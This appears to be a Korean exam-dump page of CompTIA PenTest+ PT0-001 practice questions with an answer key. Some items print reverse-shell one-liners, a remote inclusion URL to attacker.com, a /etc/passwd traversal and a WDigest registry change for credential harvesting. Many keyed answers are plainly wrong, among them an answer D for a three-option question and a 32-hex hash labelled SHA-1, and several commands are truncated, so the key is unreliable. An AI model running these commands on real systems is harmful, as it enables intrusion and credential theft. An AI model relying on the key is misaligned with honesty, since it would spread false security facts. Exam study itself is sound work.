CompTIA PT0-001 시험 문제 2024 년 업데이트: 시험 준비, CompTIA PenTest+ 인증 | SPOTO
2024 년 업데이트된 CompTIA PT0-001 시험 문제로 CompTIA PenTest+ (PT0-001) 자격증을 준비하세요. 시험에 대비하는 가장 좋은 방법은 최신 시험 문제로 연습하는 것입니다. 우리의 연습 시험은 전통적인 데스크톱과 서버뿐만 아니라 클라우드와 모바일 플랫폼과 같은 새로운 환경에서의 실습 테스트를 포함하여 다양한 주제와 시나리오를 다룹니다. 시험 문제, 샘플 문제, 시험 덤프 등을 활용하면 성공에 필요한 지식과 자신감을 얻을 수 있습니다. 모의 시험과 시험 시뮬레이터는 실제와 같은 시험 환경을 제공하여 시험 준비를 더욱 강화합니다. 시험 자료와 시험 답안을 통해 PT0-001 시험에 완벽하게 대비하고 쉽게 CompTIA PenTest+ 자격증을 취득할 수 있습니다.
모의 침투 테스터는 웹 애플리케이션 취약점 스캔 보고서를 클라이언트에 전달합니다. 모의 침투 테스터가 취약점을 중간 심각도로 평가합니다. 이전 보고서에서 동일한 취약점이 심각도 높음으로 보고되었습니다. 다음 중 심각도가 낮아진 가장 가능성이 높은 이유는 무엇인가요?
A. 클라이언트가 버전을 업데이트하지 않고 핫픽스를 적용했습니다
B. 위협 환경이 크게 변화했습니다
C. 클라이언트가 새로운 기능으로 코드베이스를 업데이트했습니다
D. 현재 이 취약점에 대한 알려진 익스플로잇은 없습니다
답변 보기
정답:
A
질문 #2
모의 침투 테스터가 취약점 스캔을 수행하기 전에 일부 원격 호스트에서 초기 정보 수집을 수행합니다. 테스터는 다음 명령을 실행합니다: nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 다음 중 여러 IP 주소가 지정된 이유를 가장 잘 설명하는 것은 무엇인가요?
A. 네트워크는 서브넷이 25개 이상으로 구성되어 있으며 테스터는 두 개의 다른 서브넷에 있는 호스트에 액세스해야 했습니다
B. 테스터는 여러 개의 가짜 주소를 포함하여 보다 은밀한 검사를 수행하려고 합니다
C. 스캔 기계에는 지정된 비율로 스캔 요청의 균형을 맞추기 위한 여러 인터페이스가 있습니다
D. 검색 스캔은 첫 번째 주소 집합에 대해 실행되는 반면, 보다 심층적이고 공격적인 스캔은 후자의 호스트에 대해 실행됩니다
답변 보기
정답:
A
질문 #3
모의 침투 테스터가 외부 취약점 스캔 중에 다음과 같은 결과를 확인했습니다: 위의 스캔 결과에서 우선순위를 정해야 하는 공격 전략은 다음 중 어느 것입니까?
A. 오래된 소프트웨어에는 악용 가능한 구성 요소가 포함되어 있을 수 있습니다
B. 취약한 비밀번호 관리 관행이 사용될 수 있습니다
C. 암호학적으로 취약한 프로토콜이 가로채질 수 있습니다
D. 웹 서버 구성에 따라 민감한 정보가 노출될 수 있습니다
답변 보기
정답:
D
질문 #4
한 회사에서 외부 IP가 100.170.60.5인 새 VPN 집중 장치 설치에 취약점이 있는지 확인하기 위해 침투 테스터를 고용합니다. 다음 중 VPN을 사용할 수 있는지 테스트하는 명령은 무엇인가요?
A. fpipe
B. ike-scan -A -t 1 --sourceip=apoof_ip 100
C. nmap -sS -A -f 100
D. NC 100
답변 보기
정답:
B
질문 #5
모의 침투 테스터가 애플리케이션이 인터넷 연결 애플리케이션에서 기본 인증만 사용하고 있다고 보고합니다. 다음 중 가장 좋은 해결 전략은 무엇인가요?
A. HTTP 엄격한 전송 보안을 활성화합니다
B. 보안 쿠키 플래그를 활성화합니다
C. 통신 채널을 암호화합니다
D. 유효하지 않은 사용자 입력을 살균합니다
답변 보기
정답:
A
질문 #6
최고 경영자(CEO)가 최고 재무 책임자(CFO)에게 보낸 이메일에 새 공급업체에 대금을 지불하기 위해 전신 송금이 필요하다는 내용이 있습니다. 두 사람 모두 해당 공급업체를 알지 못하며 CEO는 해당 이메일을 보낸 사실을 부인합니다. 다음 중 이 공격에 사용된 동기 유형은 무엇인가요?
A. 두려움의 원리
B. 권한의 원칙
C. 희소성의 원리
D. 유사성의 원칙
E. 사회적 증명의 원칙
답변 보기
정답:
B
질문 #7
한 보안 평가자가 한 회사와 네트워크 및 시스템에 대한 종합적인 모의 침투 테스트를 완료했습니다. 평가 중에 테스터는 회사의 인트라넷 전체 급여 웹 애플리케이션에서 TLS에 사용되는 암호화 라이브러리에서 취약점을 발견했습니다. 이 취약점은 며칠 내에 패치될 것으로 예상되지만 공급업체에서 아직 패치를 적용하지 않았습니다. 다음 중 영향의 위험을 가장 잘 완화할 수 있는 전략은 무엇인가요?
A. 웹 서버 암호화 구성을 수정하여 암호화, 해싱 및 디지털 서명에 더 강력한 암호 제품군을 사용하세요
B. 애플리케이션 접속의 위험성을 인지할 수 있도록 새로운 교육을 실시합니다
C. 애플리케이션에 대한 액세스를 재무 부서로만 제한하는 ACL을 구현합니다
D. 급여 사용자에게 애플리케이션 인증에 사용되는 비밀번호를 변경하도록 요구하세요
답변 보기
정답:
C
질문 #8
회사에 대한 외부 침투 평가를 수행하기 위해 침투 테스터가 배정되었습니다. 다음 중 수동 정보 수집 프로세스에 가장 도움이 되는 단계는 무엇인가요? (두 가지를 선택하세요.)
A. 회사 건물 밖에서 기다렸다가 직원의 뒤에서 테일게이트를 시도합니다
B. 회사의 외부 네트워크 차단에 대한 취약성 검사를 수행하고, 악용 가능한 취약점을 식별하고, 접근을 시도합니다
C. 도메인 및 IP 등록 웹사이트를 사용하여 회사의 외부 넷블록 및 외부 대면 애플리케이션을 식별합니다
D. 소셜 미디어에서 자신이 사용하는 기술에 대한 정보를 게시하는 정보 기술 직원을 검색하세요
E. 회사의 외부 웹메일 애플리케이션을 식별하고 사용자 계정을 열거한 후 비밀번호 추측을 시도하여 액세스 권한을 얻습니다
답변 보기
정답:
DE
질문 #9
다음 스크립트가 주어집니다: 다음 중 이 스크립트의 목적을 가장 잘 설명하는 것은?
A. 로그 수집
B. 이벤트 수집
C. 키 입력 모니터링
D. 디버그 메시지 수집
답변 보기
정답:
C
질문 #10
제한된 권한으로 Windows 시스템에서 지속성을 유지하려고 할 때 테스터가 사용해야 하는 레지스트리 키는 다음 중 어느 것인가요?
A. HKEY_CLASSES_ROOT
B. Hkey_local_machine
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
답변 보기
정답:
C
질문 #11
소프트웨어 개발자가 애플리케이션의 코드에 취약점이 있는지 테스트하려고 합니다. 다음 중 소프트웨어 개발자가 수행해야 하는 프로세스는 무엇인가요?
A. 취약점 검사
B. 동적 스캔
C. 정적 스캔
D. 규정 준수 검사
답변 보기
정답:
A
질문 #12
웹 애플리케이션을 평가하는 동안 모의 침투 테스터는 서버에서 임의의 명령이 실행될 수 있음을 발견합니다. 이 공격을 한 단계 더 발전시키고 싶었던 모의 침투 테스터는 192.168.1.5에서 공격 머신으로 리버스 셸을 되찾을 수 있는 방법을 모색하기 시작합니다. 다음 중 가능한 방법은 무엇인가요? (2가지 선택).
A. NC 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
답변 보기
정답:
BC
질문 #13
다음이 주어졌을 때: http://example.com/download.php?id-.../.../.../etc/passwd 다음 중 위의 공격을 가장 잘 설명하는 것은?
A. 악성 파일 업로드 공격
B. 리디렉션 공격
C. 디렉토리 트래버스 공격
D. 안전하지 않은 직접 객체 참조 공격
답변 보기
정답:
C
질문 #14
한 회사가 핵심 비즈니스 애플리케이션의 보안을 평가하기 위해 모의 침투 테스트 전문 회사와 계약을 맺었습니다. 이 회사는 이 회사에 Java 바이트코드 사본을 제공했습니다. 이 회사가 정적 코드 분석기를 실행하기 전에 수행해야 하는 단계는 다음 중 어느 것입니까?
A. 동적 코드 분석기를 통해 애플리케이션을 실행합니다
B. 퍼징 유틸리티를 사용합니다
C. 애플리케이션을 디컴파일합니다
D. 메모리 할당을 확인합니다
답변 보기
정답:
D
질문 #15
보안 분석가가 WAF 로그를 모니터링하는 동안 다음 URL에 대한 성공적인 공격을 발견했습니다: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php 이러한 유형의 공격을 방지하려면 다음 중 어떤 해결 단계를 수행해야 하나요?
A. 블랙리스트를 구현합니다
B. URL 리디렉션을 차단합니다
C. 더블 URL로 매개변수를 인코딩합니다
D. 애플리케이션에서 외부 호출을 중지합니다
답변 보기
정답:
B
질문 #16
한 회사에서 자체 개발한 안드로이드 애플리케이션의 보안을 검토하기 위해 모의 침투 테스터를 요청했습니다. 모의 침투 테스터는 평가를 지원하기 위해 APK 파일을 받았습니다. 모의 침투 테스터는 APK 파일에서 SAST를 실행하려고 합니다. 모의 침투 테스터가 먼저 수행해야 하는 준비 단계는 다음 중 어느 것입니까? (두 개 선택).
A. JAR로 변환합니다
B. 디컴파일
C. 애플리케이션을 교차 컴파일합니다
D. JAR 파일을 DEX로 변환합니다
E. APK에 다시 서명합니다
F. ADB에 연결합니다
답변 보기
정답:
AB
질문 #17
최근 완료된 모의 침투 테스트에 따르면 레거시 웹 애플리케이션이 SQL 인젝션에 취약한 것으로 나타났습니다. 연구에 따르면 취약점을 완전히 해결하려면 아키텍처 변경이 필요하며, 이해 관계자들은 애플리케이션의 가용성을 위험에 빠뜨릴 수 있는 입장이 아닙니다. 이러한 상황에서 다음 중 SQL 인젝션 위험을 최소화하기 위한 노력이 적게 드는 단기적인 해결책은 무엇인가요? (두 가지를 선택하세요.)
A. 코드에서 인라인 SQL 문을 식별하고 제거합니다
B. 저장 프로시저에서 동적 SQL을 식별하고 제거합니다
C. 모든 사용자 입력을 식별하고 소독합니다
D. SQL 문에 화이트리스트 접근 방식을 사용합니다
E. SQL 문에 블랙리스트 접근 방식을 사용합니다
F. 악성 입력의 출처를 파악하고 IP 주소를 차단합니다
답변 보기
정답:
CD
질문 #18
테스트 중에 클라이언트의 핵심 서버에서 심각한 취약점이 발견되었습니다. 다음 중 다음 중 어떤 조치를 취해야 하나요?
A. 영향을 받는 서비스의 네트워크 포트를 비활성화합니다
B. 모든 조사 결과를 작성한 다음 고객에게 제출합니다
C. 발견한 내용을 고객에게 즉시 알립니다
D. 공격자가 악용할 수 없도록 대상을 오프라인으로 전환합니다
답변 보기
정답:
A
질문 #19
다음 중 침투 테스트자가 메타스플로잇에서 인터넷에서 사설 네트워크에 액세스할 수 있는 명령은?
A. 설정 호스트 192
B. 자동 경로 실행 -s 192
C. db_nmap -iL /tmp/privatehosts
D. 보조/서버/삭스4a 사용
답변 보기
정답:
A
질문 #20
한 회사는 웹 애플리케이션 모의 침투 테스트를 수행하기 위해 컨설턴트를 고용할 계획을 세우고 예산을 확보했습니다. 취약점을 발견하자 회사는 컨설턴트에게 다음 작업을 수행하도록 요청했습니다: 코드 검토 방화벽 설정 업데이트 이 상황에서 다음 중 어떤 일이 발생했나요?
A. 범위 크립
B. 사후 검토
C. 위험 수용
D. 위협 예방
답변 보기
정답:
A
질문 #21
고객이 모의 침투 테스터에게 새로운 웹 애플리케이션의 가용성을 평가해 달라고 요청하고 있습니다. 다음 중 테스터가 사용해야 하는 공격 유형은 무엇인가요?
A. TCP SYN 플러드
B. SQL 주입
C. XSS
D. 크리스마스 스캔
답변 보기
정답:
B
질문 #22
Linux 파일 시스템에서 다음 명령을 실행합니다: chmod 4111 /usr/bin/sudo 다음 중 현재 악용될 수 있는 문제는 무엇인가요?
A. 커널 취약점
B. 끈적이는 비트
C. 인용되지 않은 서비스 경로
D. 잘못 구성된 sudo
답변 보기
정답:
B
질문 #23
침투 테스터는 단일 워크스테이션을 손상시킨 후 최소한의 장애물로 도메인 전체를 가로질러 이동할 수 있습니다. 다음 중 보고서에서 가장 추천할 만한 방어 전략은 무엇인가요? (3개 선택).
A. 각 머신에 대해 로컬 관리자 자격 증명을 무작위로 지정합니다
B. 로컬 관리자의 원격 로그온을 비활성화합니다
C. 모든 로그인에 다단계 인증을 요구합니다
D. 최소 비밀번호 복잡성 요건을 높입니다
E. 추가 네트워크 액세스 제어를 적용합니다
F. 모든 워크스테이션에서 전체 디스크 암호화를 사용하도록 설정합니다
G. 각 호스트를 자체 VLAN으로 세분화합니다
답변 보기
정답:
CDE
질문 #24
다음 중 침투 테스트를 수행할 때 확인된 결과를 기밀로 유지하는 것이 중요한 이유를 가장 잘 설명하는 것은?
A. 모의 침투 테스트 결과에는 종종 회사의 지적 재산이 포함되어 있습니다
B. 침투 테스트 결과가 공개될 경우 소비자 불만을 초래할 수 있습니다
C. 모의 침투 테스트 결과는 기밀 정보가 포함된 법적 문서입니다
D. 모의 침투 테스트 결과는 공격자가 시스템을 손상시키는 데 도움이 될 수 있습니다
답변 보기
정답:
D
질문 #25
침투 테스터는 인프라 측면을 완료한 후 대상 회사의 직원에 대해 OSINT를 수행해야 합니다. 다음 중 모의 침투에 가장 적합한 단계는 무엇인가요?
A. 회사에 전화하여 소셜 엔지니어링 기법을 사용하여 직원 정보를 얻습니다
B. 고객을 방문하여 사칭을 통해 직원으로부터 정보를 얻습니다
C. 직원에게 스푸핑 이메일을 보내 직원이 민감한 정보로 응답하는지 확인합니다
D. 소셜 네트워킹 사이트 등 인터넷에서 직원에 대한 정보를 검색합니다
답변 보기
정답:
D
질문 #26
전시 버튼을 클릭합니다. 전시회에 표시된 Nikto 취약점, 검사 결과를 고려할 때 다음 중 대상 시스템을 익스플로잇하는 데 사용할 수 있는 익스플로잇 기법은 무엇입니까? (두 가지를 선택하세요.)
A. 임의 코드 실행
B. 세션 하이재킹
C. SQL 주입
D. 로그인 자격 증명 무차별 대입
E. 사이트 간 요청 위조
답변 보기
정답:
BD
질문 #27
테스터가 대상 시스템에서 다음 명령을 실행하려고 합니다: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 이전 명령이 성공하려면 테스터의 Linux 시스템에서 다음 중 어떤 명령을 추가로 실행해야 하나요?
A. NC -NLVP 443
B. NC 10
C. nc -w3 10
D. nc -e /bin/sh 10
답변 보기
정답:
D
질문 #28
다음 중 메타스플로잇 데이터베이스를 시작하는 명령은 무엇인가요?
A. msfconsole
B. 작업 공간
C. msfvenom
D. db_init
E. db_connect
답변 보기
정답:
A
질문 #29
보안 컨설턴트가 이전에 식별된 사용자 계정으로 기기를 공격하려고 합니다. 다음 중 어떤 유형의 공격이 실행되고 있나요?
A. 크리덴셜 덤프 공격
B. DLL 인젝션 공격
C. 리버스 쉘 공격
D. 해시 공격 통과
답변 보기
정답:
D
질문 #30
한 소프트웨어 개발팀은 최근 온프레미스 환경의 새로운 애플리케이션 소프트웨어로 마이그레이션했습니다. 모의 침투 테스트 결과 여러 취약점이 존재하는 것으로 나타났습니다. 모의 침투 테스터가 라이브 환경이나 테스트 환경에 액세스할 수 없는 경우 가상 머신에 동일한 환경을 만들어 테스트하는 것이 더 나을 수 있습니다. 다음 중 확인을 위해 가장 중요한 것은 무엇인가요?
A. 보안되지 않은 서비스 및 프로토콜 구성
B. SMB 및 SMTP 서비스 실행
C. 취약한 비밀번호 복잡성 및 사용자 계정
D. 잘못된 구성
답변 보기
정답:
A
질문 #31
블랙박스 침투 테스트 전략은 테스터에게 다음을 제공합니다:
A. 대상 목록
B. 네트워크 다이어그램
C. 소스 코드
D. 권한 있는 자격 증명
답변 보기
정답:
D
질문 #32
모의 침투 테스터가 네트워크에서 SSH를 스캔하고 있으며 제공된 대상 목록을 가지고 있습니다. 다음 중 테스터가 사용해야 하는 Nmap 명령은 무엇인가요?
A. nmap -p 22 -iL 대상
B. nmap -p 22 -sL 대상
C. nmap -p 22 -oG 대상
D. nmap -p 22 -oA 대상
답변 보기
정답:
A
질문 #33
다음 중 보안 컨설턴트가 다음과 유사한 비밀번호 해시를 발견한 경우: b117525b345470c29ca3d8ac0b556ba8 다음 중 올바른 해시 형식은 무엇인가요?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
답변 보기
정답:
D
질문 #34
웹 애플리케이션에 대한 모의 침투 테스트를 수행 중인 엔지니어가 필드 데이터에서 전송되는 사용자 로그인 프로세스가 HTTP GET 메서드를 사용하는 것을 발견합니다. 민감한 정보가 노출될 위험을 줄이려면 양식을 전송할 때
A. HTTP POST 방식
B. HTTP 옵션 메서드
C. HTTP PUT 메서드
D. HTTP TRACE 메서드
답변 보기
정답:
A
질문 #35
한 기업의 보안 평가를 수행한 후, 고객의 테스트 환경을 사용할 수 없었던 시간에 대한 비용이 청구된 것을 발견했습니다. 고객은 부당하게 청구되었다고 주장합니다. 다음 중 이러한 상황에서 지침을 제공할 수 있는 문서로 가장 적합한 것은 무엇인가요?
A. SOW
B. NDA
C. EULAD
답변 보기
정답:
D
질문 #36
약혼을 계획할 때 다음 중 가장 중요한 것은 무엇인가요? (두 개 선택).
A. 목표/목적
B. 아키텍처 다이어그램
C. 충격에 대한 내성
D. 보고서 저장 시간
E. 회사 정책
답변 보기
정답:
AC
질문 #37
간단한 버퍼 오버플로를 악용하기 위해 침투 테스터가 덮어써야 하는 CPU 레지스터는 다음 중 어느 것입니까?
A. 스택 포인터 레지스터
B. 인덱스 포인터 레지스터
C. 스택 베이스 포인터
D. 대상 인덱스 레지스터
답변 보기
정답:
A
질문 #38
모의 침투 테스터가 손상된 'python -c ' import pty;pty.spawn ("/bin/bash") ' 에서 다음을 실행합니다. 다음 중 테스터가 수행하는 작업은 무엇인가요?
A. Bash 기록 제거하기
B. 셸 업그레이드
C. 샌드박스 만들기
D. 자격 증명 캡처
답변 보기
정답:
B
질문 #39
침투 테스터가 도메인 컨트롤러에 대한 전체 셸을 가지고 있으며 21일 동안 도메인에 인증되지 않은 모든 사용자 계정을 찾으려고 합니다. 다음 중 이 작업을 가장 잘 수행할 수 있는 명령은 무엇인가요?
A. dsrm -users "DN=company
B. dsuser -name -계정 -한도 3
C. dsquery 사용자 -비활성 3
D. dsquery -o -rdn -limit 21
답변 보기
정답:
D
질문 #40
모의 침투 테스터가 WPA2-PSK 보안 무선 네트워크를 모니터링하여 클라이언트와 액세스 포인트 간의 핸드셰이크를 캡처하려고 시도하고 있습니다. 테스터는 식별된 네트워크의 올바른 채널을 모니터링하고 있지만 핸드셰이크를 캡처하는 데 실패했습니다. 이 시나리오가 주어졌을 때, 다음 중 테스터가 이 핸드셰이크를 획득하는 데 가장 도움이 되는 공격은 무엇입니까?
A. 카르마 공격
B. 인증 해제 공격
C. 조각화 공격
D. SSDI 방송 홍수
답변 보기
정답:
B
질문 #41
침투 테스터가 컴퓨터에서 다음 Nmap 스캔을 실행했습니다: nmap -aV 192.168.1.5 이 조직은 해당 환경에서 텔넷을 비활성화했다고 말했습니다. 그러나 Nmap 스캔 결과에 따르면 포트 22는 닫혀 있고 포트 23은 SSH에 열려 있는 것으로 나타났습니다. 다음 중 이 상황을 가장 잘 설명하는 것은 무엇인가요?
A. 조직에서 텔넷을 비활성화하지 못했습니다
B. Nmap 결과에 포트 23에 대한 오탐이 포함되어 있습니다
C. 포트 22가 필터링되었습니다
D. 서비스가 비표준 포트에서 실행 중입니다
답변 보기
정답:
A
질문 #42
다음 중 스피어 피싱 공격의 예는 무엇인가요?
A. SMS 공격으로 임원 표적화하기
B. 이메일 공격으로 특정 팀 표적화
C. USB 키 드롭으로 무작위 사용자 타겟팅
D. 워터링홀 공격으로 조직 표적화하기
답변 보기
정답:
A
질문 #43
모의 침투 테스터가 시스템에 "고스트" 취약점이 존재하는지 수동으로 확인하려고 합니다. 다음 중 취약점을 검증하는 올바른 방법은 무엇인가요?
A. GHOST 파일을 Linux 시스템에 다운로드하고 gcc -o GHOST test i:
B. GHOST 파일을 Windows 시스템에 다운로드하고 gcc -o GHOST GHOST
C. GHOST 파일을 Linux 시스템에 다운로드하고 gcc -o GHOST
D. GHOST 파일을 Windows 시스템에 다운로드하고 gcc -o GHOST test i:
답변 보기
정답:
C
질문 #44
모의 침투 테스터가 웹 기반 뱅킹 애플리케이션에 대한 블랙박스 평가를 수행하고 있습니다. 테스터에게는 로그인 페이지의 URL만 제공되었습니다. 아래 코드와 출력이 주어졌습니다: 다음 중 테스터가 수행하려는 작업은 무엇인가요?
A. 권한을 수평적으로 에스컬레이션합니다
B. 페이지를 스크랩하여 숨겨진 필드를 찾습니다
C. HTTP 응답 코드를 분석합니다
D. HTTP 헤더를 검색합니다
답변 보기
정답:
D
질문 #45
다음 중 표적의 외부 도메인에서 수동 정찰을 수행하는 데 가장 적합한 것은 무엇입니까?
A. 복숭아
B. CeWL
C. OpenVAS
D. 쇼단
답변 보기
정답:
D
질문 #46
모의 침투 테스트 중에 테스터가 피싱 캠페인을 실행하고 Windows 10 OS를 실행하는 내부 PC에서 셸을 수신합니다. 테스터는 Mimikatz로 인증정보 수집을 수행하려고 합니다. 다음 중 메모리에서 자격 증명 캐싱을 허용하는 레지스트리 변경은 무엇인가요?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCU\시스템\현재제어설정\제어\보안공급자\W다이제스트 /v 사용자로고크레덴셜 /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg 추가 HKLM\시스템\현재제어설정\제어\보안공급자\W다이제스트 /v 사용자로고크레덴셜 /t REG_DWORD /d 1
답변 보기
정답:
A
질문 #47
모의 침투 테스트가 시작되면 테스터는 이메일 주소, 회사 전화번호, 컴퓨터 이름, 사무실 위치 등의 직원 데이터가 포함된 파일을 찾습니다. 이 파일은 공용 웹 서버에서 호스팅됩니다. 다음 중 이 정보를 얻기 위해 사용된 기법을 가장 잘 설명하는 것은?
A. 서비스 열거
B. OSINT 수집
C. 포트 스캔
D. 사회 공학
답변 보기
정답:
B
제출 후 답변 보기
질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.
참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.